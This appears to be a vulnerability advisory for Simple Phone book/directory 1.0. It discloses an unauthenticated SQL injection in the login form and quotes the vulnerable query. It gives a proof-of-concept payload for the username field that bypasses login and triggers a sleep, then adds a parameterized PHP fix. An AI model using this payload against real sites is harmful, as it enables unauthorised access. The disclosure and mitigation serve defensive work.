# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)
# Date: 21/08/2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html
# Version: 1.0
# Tested on: Linux (Ubuntu 20.04) using LAMPP

# SQL Injection
# Vulnerable page
http://localhost/PhoneBook/index.php
# Vulnerable parameter
username1 & password
# POC
Username =' or sleep(5)='---
Password =' '
Using these to log in will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -"
# Vulnerable Code
index.php line 13
$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");
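
# Mitigation (added example)
The query above builds SQL by string interpolation, so the username value becomes part of the statement. The following is an added example, not the vendor's code, showing the same lookup with a bound parameter. `$dbcon`, `userdetails`, `username`, `password` and the `username1` field come from this advisory; `find_user()`, the connection placeholders and a `password` column holding `password_hash()` output are assumptions.

```php
<?php
// Added example, not the vendor's code: parameterized replacement for the
// query on index.php line 13. find_user() is a hypothetical helper name.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function find_user(mysqli $dbcon, string $username, string $password): ?array
{
    // The statement text is fixed. User input travels only as a bound value,
    // so quotes or sleep() in the username are compared as literal data.
    $stmt = $dbcon->prepare(
        'SELECT username, password FROM userdetails WHERE username = ? LIMIT 1'
    );
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd
    $stmt->close();

    // Assumption: the password column stores password_hash() output.
    // Verification happens in PHP, so the password never enters the SQL text.
    if (!$row || !password_verify($password, $row['password'])) {
        return null;
    }
    return $row;
}

// Connection values are placeholders; substitute the application's own.
$dbcon = new mysqli('localhost', 'DB_USER', 'DB_PASS', 'DB_NAME');

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $u = $_POST['username1'] ?? '';
    $p = $_POST['password'] ?? '';
    // Reject array-valued fields before they reach the typed helper.
    $user = (is_string($u) && is_string($p)) ? find_user($dbcon, $u, $p) : null;

    if ($user === null) {
        http_response_code(401);
        exit('Invalid username or password');
    }
    session_start();
    session_regenerate_id(true); // new session id after a successful login
    $_SESSION['username'] = $user['username'];
}
```

With this change the POC username is looked up as an ordinary string, matches no row, and the request returns immediately instead of sleeping.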